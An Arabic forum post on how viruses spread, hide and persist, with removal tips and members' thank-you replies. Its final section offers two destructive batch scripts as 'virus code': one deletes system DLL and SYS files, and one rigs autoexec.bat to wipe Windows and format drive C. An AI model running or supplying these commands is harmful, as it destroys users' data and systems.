تجارب شخصية مع الفيروسات( شرح مصور )

أقدم لكم اليوم هذا الموضوع المتواضع عن الفايروسات وآثارها التخريبية
أول شيء يا أحبائي محور الموضوع هو فهم تكتيكات الفيروسات وكيفية تصرفها والآثار التي تتركها في أجهزتنا

وبالطبع الهدف الأول والأخير من هذا الموضوع هو العلم والفائدة

وهذا الموضوع مليان أكشن وأشياء عملية أكثر من الكلام النظري الممل

وحتى لا تؤثر هذه النقطة سلبا في الموضوع فقد أشرت إلى روابط خارجية فيها شرح أوسع عن النقاط النظرية التي لن أتوسع بذكرها

نبدأ على بركة الله

قمت بتقسيم الموضوع إلى هذه النقاط

1-تعريف سريع للفايروس.
2-لماذا يصنعونه!!
3-كيف ينتشر؟!
4-فهم آلية عمله التخريبية
5-التخلص من الفايروسات.
6-نصائح عامة.
7-كيف يتم برمجة فيروس

تعريف الفايروس.

الفايروس حسب تعريفي واجتهادي الشخصي

هو بكل بساطة برنامج يهدف إلى الضرر بالكومبيوتر (بياناته ،نظامه أو قِطَعه) أو صاحب الكومبيوتر

طبعا الفايروسات لها عوائل وقبائل

فمنها الديدان ومنها الفايروس التقليدي ومنها أحصنة طروادة

وتنتشر الفايروسات غالبا في امتدادات تنفيذية أي ملفت تعمل (يتم تنفيذها) بمجرد الضغط عليها

وأشهر هذه الامتدادات هو exe

وأيضا قد تراها أحيانا بالامتدادين الأخوين bat,cmd

وهناك الامتداد com ولكن يندر استخدامه الآن فهو قديم جدا
وقد تنتشر بامتدادات حوافظ الشاشة Screen Savers ورمزه scr
والذي يجمع بين هذه الامتدادات exe,bat,cmd,com,scr
أنها كلها تنفيذية كما أسلفنا الذكر
أي أنها تعمل بمجرد فتحها

وقد تنتشر الفايروسات عبر الملفات غير التنفيذية مثل dll وعندما تكون بهذه الصيغة أو ما يشابهها فغالبا ما يكون هناك مشغل يقوم بتنفيذ هذه الملفات إذ أن فتح هذه الملفات لا يفعلها

وأشبه لكم الأمر بالامتداد الصوتي MP3 فليك تستمع لهذا الملف قد تقوم بتشغيله بـ Windows Media Player

ودون وجود ذاك البرنامج أو ما يقوم محله فإنك لن تستطيع الاستماع للملف الصوتي

الأمر نفسه في ملفات الـ Dll

أعتقد أن الكلام أعلاه معظمنا

ولكن هل تعلم أن الفايروسات قد تنتشر عبر ملفات الأوفيس مثلا doc, xls ,ppt

نعم قد تنتشر عبر ملفات الوورد والإكسل والباور بوينت وغيرها

إذ يوجد في هذه البرامج ما يسمى وحدات ماكرو

حيث يمكن أن تضيف ملف exe كوحدة ماكرو في ملف الوورد

لاحظو الصورة

أحيانا تتخفى الفايروسات بأيقونات لأشياء غير تنفيذية

طبعا تغاضيت عن الكثير من النقاط في هذه الفقرة وبإمكانك مراجعة هذا الموضوع الرائع للقراءة عنها

http://www.microsoft.com/middleeast/.../virus101.mspx

لماذا يصنعونه!!

صراحة هذا أصعب سؤال بالموضوع

السلام عليكم ورحمة الله وبركاته:أعاني كثيرا من إصابة جهازي بالفيروسات، مما يجعلني أتساءل .. لماذا يصنعون الفيروسات ؟ وما مصلحتهم من انتشارها ؟

محمد - الرياض

ج1: ظهر أول فيروس حاسب آلي عام 1986 عندما قام الأخوان بسيط و أمجد فاروق (من دولة باكستان) باكتشاف أنه بإمكانهما كتابة نص برمجي يتم تخزينه على القرص المرن بحيث يعمل تلقائيا عند تشغيل الجهاز بواسطة القرص المرن، حيث قاما بكتابة برنامج يقوم بنسخ نفسه مع تغيير Volume الخاص بالقرص المرن إلى (c ) Brain وانتشر هذا الفيروس بشكل كبير مما أدى إلى ظهور مصطلح فيروس حاسب آلي. ولعل هذه كانت هي الشرارة التي أدت إلى انتشار نيران الفيروسات في أوساط الحاسب الآلي.

لا أحد يستطيع الإجابة عن السبب الذي يدفع المبرمجين لكتابة الفيروسات، فبعض الدراسات النفسية تبين أنها مسألة تحدي للذات لكي يثبت المبرمج لنفسه قدرته على كتابة نص برمجي مخالف للعادة. والبعض يعزو ذلك إلى أنها مسألة بحث عن الشهرة بتسمية الفيروس باسم معين ونشره حتى ينتشر معه الاسم كما حدث في فيروس ميليسا الشهير والذي أطلق على اسم راقصة.

وبعض الفيروسات قد وضعت تخليدا لذكرى شخص أو مناسبة، مثل فيروس مايكل أنجلو. وغيرها من الأسباب الأخرى.

كما يعتقد البعض أن الشركات المنتجة لبرامج الحماية تقوم بإصدار فيروسات جديدة ونشرها وذلك حتى تزيد مبيعات برامجها.
ولكن على الرغم من جميع هذه الاحتمالات، تبقى الفيروسات ومصادرها أحد الجوانب الغامضة في مجال الحاسب الآلي، فلا يمكن أن نتنبأ بما سوف تكشف الأيام القادمة من فيروسات بطبائع وهيئات مختلفة.

كيف ينتشر!!

ينتشر الفايروس عادة عبر وحدات التخزين الخارجية المصابة وذلك بطريقة

AutoRun

أو فتح ملفات مصابة (كانت أصلا نظيفة)

أو عبر الإيميلات مجهولة المصدر

أو المواقع المشبوهة (الإباحية...)

وغيرها

راجع

http://www.microsoft.com/middleeast/.../virus101.mspx

فهم آلية عمله التخريبية

طبعا الفايروسات لا تسير كلها على نفس النهج ولكن هناك الكثير من التكتيكات والآليات التي تتخذها

وسأقوم هنا بشرح أكثرها انتشارا وأيضا توضيح بعض المواضع التي تشترك فيها أكثر الفايروسات انتشار

A

تقنية AutoRun

هذه الكلمة تعني التشغيل التلقائي

1 فمثلا لنأخد هذا المثال لنرى كيف تعمل هذه الطريقة

في الصورة يوجد ملفان متعلقان بالقضية هما

Autorun.inf

و

lol.exe

لاحظ أن محتوى ملف الأوتورن يأمر بأن يتم فتح ملف lol.exe عند الدخول للقرص (C) مباشرة أو حتى اختيار أحد هذه الأوامر open ,explore, auto play

وهذا دليل على أن طريقة فتح القرص المفيرس من خلال النقر عليه باليمين ثم اختيار explore غير ناجحة إذا كان هذا السطر موجود في ملف الأوتورن

shell\explore\command =lol.exe

2 وأيضا ما يتعلق بموضوعنا هو فايروسات الـRECYCLER حيث تعمل بطريقة الأوتورن

مثل فايروس ise32.exe

3 آخر نقطة هنا هي

الأوتورن المليانة خرابيش وهناك نوعان الأول على الخفيف

لاحظوا موضوع الفاصلة والتي تضاف في بداية سطر الخرابيش

لكي يتم التغاضي عن السطر

والثاني مبالغ فيه

هناك نوع آخر من الأوتورن شرحه في الفقرة القادمة

نقطة مهمة جدا

كما ذكرنا أحيانا النقر المباشر و open ,explore, auto play

كلها تقوم بتفعيل الفايروس ما الحل إذا هناك حلان

الأول بسيط جدا
ولكن أحيانا لا يعمل
وهو أن تفتح قائمة ابدأ ثم اذهب إلى تشغيل واكتب
C: أو D: أو E: أو F: إلخ
Start > Run > C: or D: or E: etc

على حسب الدرايفر الذي تود فتحه وسيفتح دون تشغيل الفايروس

الحل الثاني

استخدم هذه الأداة هنا

http://www.mediafire.com/download.php?zyqooomx2dy

B

تقنية التخفي والخداع

تقوم الفايروسات بعدة طرق لخداع المستخدم بحيث يعتقد أنها ملفات عادية دون أدنى شك ،ومن هذه الطرق طريقة الفايروس Brontok

وهو أول فايروس أصابني على ما أذكر

حيث ينسخ الفايروس نفسه داخل كل مجلد بنفس اسم المجلد وبأيقونة المجلد المعروفة

مثل هذا المثال هنا

حيث يوجد مجلد اسمه hello وبداخله ستلاحظ مجلد اسمه hello أيضا

لكن في الحقيقة ذاك الثاني ليس مجلد بل ملف
وهذه الصورة توضح حيث بعد النظر في خصائص hello تجد أن نوعه حافظة شاشة أي أنه فايروس بامتداد SCR الذي ذكرناه ومتخفي باسم وأيقونة مجلد

وأيضا نوع مشابه لهذا هو فايروس سمعت عنه لكن لم أره

يقال أنه يتخفى بأيقونة مجلد ويقوم بإخفاء أحد المجلدات ويأتي هو مكانه وبنفس الاسم ليقوم المستخدم بفتحه وتصير الكوارث

ومن الطرق أيضا وهي تابعة لموضوع الأوتورن

هذه الطريقة وهي أن الفايروس يتخفى بامتداد jpg الصوري مثل o_o.jpgلكي يوهم المستخدم بأنه صورة

ولكن ملف الأوتورن التابع له يوضح أن الفايروس عبارة عن سكربت Script بامتداد vbs

وهذا الامتداد يعمل عن طريق الملف Wscript.exe

والواضح في ملف الأوتورن أنه أمر الـ Wscript.exe أن يقوم بتشغيل الـفايروس

ومن تقنيات التخفي والخداع

التخفي بأيقونات وأسماء ملفات النظام الأساسية مثل

حيث تخفى

الفايروس svchost باسم ملف النظام svchost

والفايروسsmss باسم ملف النظام smss

وإن لاحظت أن الفايروس services قد تخفى بأحد أيقونات النظام

لكن السؤال هنا كيف أعلم متى يكون svchost وغيره فايروس ومتى يكون ملف نظام مهم!!

الجواب بسيط جدا

لاحظ أن جميع الملفات المدعوة بـ svchost مظللة بالأخضر

إن التي ذكر أمامها SYSTEM أو LOCAL SERVICE أو NETWORK SERVICE

هي في الغالب ملفات للنظام مهمة جدا

أما ما ذكر أمامها اسم المستخدم وهو هنا Lola فهو في الغالب فايروس

إذا الملف المظلل بالأخضر الالأول هو الفايروس لأن ما بعده اسم المستخدم وليس إحدى الكلمات السابقة
نقطة أخيرة في هذه الفقرة وهي أنكم كما تعلمون معظم الفايروسات تقوم بإخفاء نفسها
وتظهر بأيقونة باهتة (في حال أنه خيار إظهار الملفات المخفية مفعل وسليم)
والمشكلة فيها هي أنه عند المحاولة للتعديل في خصائصها لا تستطيع وذلك لأنها غير مفعلة

ولكي نتمكن من تحويلها لملفات عادية أي غير مخفية نتبع الآتي

افتح قائمة ابدأ ثم اذهب إلى تشغيل واكتب cmd

Start > Run > cmd

ثم اكتب

Attrib -r -s -h

ثم مسار الملف كاملا بين “ “
مثال
Attrib -r -s -h"C:\lol.exe"

عندها سيتم إزالة

Read only , System , Hidden

من خصائص الملف وحتى ولو لم يمكن إزالتها بالطريقة العادية

C

دراسة متعمقة في بعض عمليات فايروس نموذجي

في هذه النقطة سنقوم بافتراض وجود فايروس نموذجي وسنتتبع أهم ما يفعله الفايروس في النظام

أولا الفايروس اسمه HTW.Trojan by Loersian

لنفترض أنه الفايروس تم تشغيله بتقنية الأوتورن السالفة الذكر

أول ما قام به الفايروس هو نسخ نفسه c:\System.exe

C:\Windows\System32\lasso.exe

لاحظ أنه استخدم تقنية تقليد ملفات النظام
____________

ملاحظة للفتح الريجستري اذهب إلى تشغيل من قائمة ابدأ واكتب regedit

tart < Run < regedit

______________

ثم توجه (الفايروس) ليس أنت لهذا المفتاح في الريجستري

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run

وقام بإضافة القيمة System

والتي تساوي

c:\System.exe

لاحظ

إن الذي قام به الفايروس هنا هو إضافة نفسه إلى بدأ التشغيل أي ليعمل مع كل مرة يعمل فيها الحاسب

بإمكانه استخدام أكثر من طريقة منها إضافة القيم إلى

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

وهي الأكثر شيوعا وهذه قائمة بأخرى مستخدمة

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnce

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\RunServicesOnce

وبإمكان الفايروس وضع اختصار لنفسه في المجلد

{CURRENTUSERDIRECTORY}\Start Menu\Programs\Startup

او

{CURRENTUSERDIRECTORY}\Start Menu\Programs\Startup

لكي يعمل مع بدء التشغيل

وهناك طرق أخرى كثيرة

ترجع للي عمل الفايروس

ملاحظة المقصود بـ /t نوع القيمة في الريجستري وبالـ /d مقدار القيمة

قام بـ

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\Hidden /t EG_DWORD /d 0

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\SuperHidden /t REG_DWORD /d 0

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\ShowSuperHidden /t REG_DWORD /d 0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Hidden /t REG_DWORD /d 0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\SuperHidden /t REG_DWORD /d 0
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced\ShowSuperHidden /t REG_DWORD /d 0

تلاحظون أنه جعل جميع تلك القيم تأخذ المقدار 0 وهذه القيم لتعطيل رؤية ملفات النظام والملفات المخفية

الجدير بالذكر هنا أن بعض الفيروسات يغير هذه القيم كل بضع ثواني أي يرجعها إلى الصفر

بحيث لو أن المستخدم تمكن من إصلاحها تعطب تلك القيم مرة أخرى

ثم قام الفايروس بمسح القيمتين

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\SHOWALL \CheckedValue

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\SHOWALL \DefaultValue

لتخريب خيار إظهار المجلدات المخفية في الـ Folder options

وقام بمنع الوصول للريجستري وإدارة المهام من خلال القيم التالية

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\system\DisableTaskMgr /t REG_DWORD /d 1

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System\DisableRegistryTools /t REG_DWORD /d 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\system\DisableTaskMgr /t REG_DWORD /d 1

كما قام بمنع ظهور خيارات المجلد Folder options

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\NoFolderOptions /t REG_DWORD /d 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\Explorer\NoFolderOptions /t REG_DWORD /d 1

أعتقد ما قام به الفايروس من آثار تخريبية هي الأمثر شيوعا باستثناء عمليات الديدان وجعل الملفات التنفيذية السليمة في الكومبيوتر مصابة ومن ناحيتي لا أعلم عن هذا النوع وليس لدي الخلفية للكتابة عنه ،ربما في المستقبل إن شاء الله

التخلص من الفايروسات.

إن الكلام عن التخلص من الفيروسات ليس بذاك الموضوع السهل

فالفيروسات عادة تنسخ نفسها بأكثر من مكان وتموه نفسها مع برامج النظام كما تقوم بتخريب الكثير من القيم داخل النظام كما ذكرنا

والحل الأمثل للتخلص من إحدى الفايروسات هو استخدام برامج الحماية وعمل فحص عميق بها .

في بعض الأحيان قد لا تستطيع تشغييل الويندوز في الوضع العادي للنظام فتضطر عندها للإقلاع من الوضع الآمن Safe Mood

وذلك بضغط F8 فور تشغيل الكومبيوتر مرات متتالية حتى تظهر خيارات نختار منها safe mood

في هذا الوضع لن تعمل معظم الفيروسات
وبإمكانك تنظيف جهازك بحرية إن كنت خبيرًا أو القيام بعملية فحص من خلال بعض الأدوات المقدمة من شركات الحماية مثل Macafee والتي تتيح لك عمل فحص داخل الوضع الآمن

ومن الحلول أيضا افحص عن طريق الدوس

Avira Rescue CD .. أو لو أمكنك أي مضاد فيروسات يفحص من خلال السيدي في وضع الدوس (DOS)

وبآخر تحديث .. لكني أنصح بالأفيرا لأنه أفضل برنامج قابلته حتى الآن .. (ولو كان ما اكتشف الفيروس المشروح بالأعلى)

لأنه لا يوجد برنامج حماية يحميك من كل الفيروسات ..

السؤال هنا لماذا أفحص من خارج الويندوز ؟

لأن الفيروسات تعمل في بيئة الويندوز لذلك يصعب حذفها ..
لكنها لا تستطيع العمل في بيئة الدوس DOS و يصبح حذفها أسهل ..

أن استخدام طريقة الفحص من الدوس قد تؤدي إلى حذف بعض ملفات النظام المصابة والذي قد يؤدي إلى دمار النظام وعدم القدرة على الإقلاع منه

وأحيانا لحل الوحيد للتخلص من الفايروس هو الفورمات

هل تخلصت من الفايروس؟

في كثير من الأحيان يحصل أننا تخلصنا من الفايروس ولكن نلاحظ أن النظام على حاله من ناحية البطء وتعطل بعض الأوامر

السبب في الغالب يكون آثار الفايروس

نصائح عامة.

بالنسبة للنصائح العامة ..... فأنصحكم كما هو معروف بعدم فتح الملفات الغريبة وخصوصا المرفقات عبر الإيميل المجهولة والغير متوقعة أو القادمة من أشخاص مجهولين.

وأيضا الابتعاد عن المواقع المشبوهة وبالأخص المواقع الإباحية ومواقع الاختراق.

أيضا أنصحكم باستخدم برنامج حماية قوي وشخصيا أنصحكم بـواحد من هذه الثلاثة

BitDefender

Avira

KasperSky

مع ملاحظة أنه يجب تحديث برناج الحماية دوريا لإن الفايروسات تجدد بشكل يومي كبير جدا أكثر مما تتصورونه

وإياك ثم إياك ثم إياك أن تعتمد على برنامج الحماية تمام

فلا تنسى أن الكومبيوتر ليس آلة ذكية وإنما الذكي هو أنت
فاستخدم ذكاءك دائما وإلا خسرت
ونقطة بسيطة أيضا في حال اشتبهت بملف ما أنه فايروس فقك برفعه على virustotal.com

وهو موقع يقوم بفحص الملف المطلوب على كل برامج الحماية تقريبا ويعطيك النتيجة فورًا

ونصيحة بخصوص فايروس منتشر هذه الأيام

وهو إحدى فايروسات الماسنجر

حيث يجعل الماسنجر عندك يرسل روابط للأشخاص الموجودي في قائمتك هي عبارة عن روابط لهذا الفايروس

كيف يتم برمجة الفيروس

انا لا اتكلم عن ماهي البرامج التي تستخدم في صناعة الفيروس خوفا من ضعفاء النفوس
ان تستخدم في ايذا الاخرين لكن سوف اتكلم عن كيفية كتابة الكود البرمجي للفيروس
فمثلا نريد من الفيروس ان يقوم بمسح ملفات (DLLوSYS)من النظام
نستعمل هذا الكود ابرمجي

@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys

وكود برمجي ثاني

echo off@

cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat

في النهاية اخواني واخواتي اعضاء منتديات الويلان أرجو إن أعجبك موضوعي

كما لا تنسوني من الدعاء لي لوالديّ برحمة والمغفرة
والدعاء ان ينصر اخواننا المرابطين في الجنوب

تحياتي لكم جميعا

[align=center]الله يعطيك العافيه على هذا العرض المفصل

عن الفايروسات بارك الله فيك وبجهودك المشهوده بهذا التخصص[/align]

[align=center]ابوخالد


الله يعطيك العافية على هذا الشرح الوافي[/align]

[align=center]ماشاء الله عليك يابو خالد مجهود اكثر من رائع
يعطيك الف الف الف عافية على الشرح المفصل
تقبل تحياتي وتقديري وشكري
دمت ودام ابداعك[/align]

اقتباس:

المشاركة الأصلية كتبت بواسطة رمضان العنزي

الله يعطيك العافيه على هذا العرض المفصل

عن الفايروسات بارك الله فيك وبجهودك المشهوده بهذا التخصص

حياك الله اخوي ابو وائل
سعدت بمرورك لموضوعي
تحياتي لك

اقتباس:

المشاركة الأصلية كتبت بواسطة talal bin mohammed

ماشاء الله عليك يابو خالد مجهود اكثر من رائع
يعطيك الف الف الف عافية على الشرح المفصل
تقبل تحياتي وتقديري وشكري
دمت ودام ابداعك

هلا وغلاء اخوي طلال
تشرفت بمرورك الكريم وردك الجميل
الله لا يحرمنا من تواجدك الدائم لمواضيعي
تحياتي لك

[align=center]الله يعافيك اخوي ابو خالد

مجهود تشكر عليه

دمت بود[/align]

[align=center]تبارك الله
تسلم اخوي ابو خالد
على هذا الشرح المصور
الله يعطيك العافيه


تحياتي وودي لك


[/align]

[align=center]بارك الله فيك

اخوي ابو خالد[/align]

[align=center]تبارك الله[/align][align=center]
تسلم اخوي ابو خالد
على هذا الشرح المصور
الله يعطيك العافيه


تحياتي وودي لك


[/align]